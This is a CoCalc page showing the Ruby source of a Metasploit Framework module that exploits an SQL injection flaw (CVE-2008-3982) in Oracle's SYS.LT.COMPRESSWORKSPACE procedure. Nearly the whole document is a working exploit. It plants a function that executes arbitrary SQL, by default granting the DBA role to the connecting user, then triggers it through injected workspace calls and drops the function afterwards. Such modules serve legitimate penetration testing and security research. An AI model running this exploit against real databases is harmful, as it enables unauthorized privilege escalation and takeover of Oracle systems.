CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE',

12
      'Description'    => %q{

13
        This module exploits an sql injection flaw in the COMPRESSWORKSPACE

14
        procedure of the PL/SQL package SYS.LT. Any user with execute

15
        privilege on the vulnerable package can exploit this vulnerability.

16
      },

17
      'Author'         => [ 'CG' ],

18
      'License'        => MSF_LICENSE,

19
      'References'     =>

20
        [

21
          [ 'CVE', '2008-3982'],

22
          [ 'OSVDB', '49324'],

23
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]

24
        ],

25
      'DisclosureDate' => '2008-10-13'))

26


27
      register_options(

28
        [

29
          OptString.new('SQL', [ false, 'SQL to execte.',  "GRANT DBA to #{datastore['DBUSER']}"]),

30
        ])

31
  end

32


33
  def run

34
    return if not check_dependencies

35


36
    name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

37
    cruft = Rex::Text.rand_text_alpha_upper(1)

38


39
    function = "

40
      CREATE OR REPLACE FUNCTION #{cruft}

41
      RETURN VARCHAR2 AUTHID CURRENT_USER

42
      AS

43
      PRAGMA AUTONOMOUS_TRANSACTION;

44
      BEGIN

45
      EXECUTE IMMEDIATE '#{datastore['SQL']}';

46
      COMMIT;

47
      RETURN '#{cruft}';

48
      END;"

49


50
    package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

51


52
    package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

53


54
    clean = "DROP FUNCTION #{cruft}"

55


56
    print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...")

57


58
    print_status("Sending function...")

59
    prepare_exec(function)

60


61
    begin

62
      prepare_exec(package1)

63
      prepare_exec(package2)

64
    rescue  => e

65
      if ( e.to_s =~ /No Data/ )

66
        print_status("Removing function '#{cruft}'...")

67
        prepare_exec(clean)

68
      else

69
        return

70
      end

71
    end

72


73
  end

74
end

75


76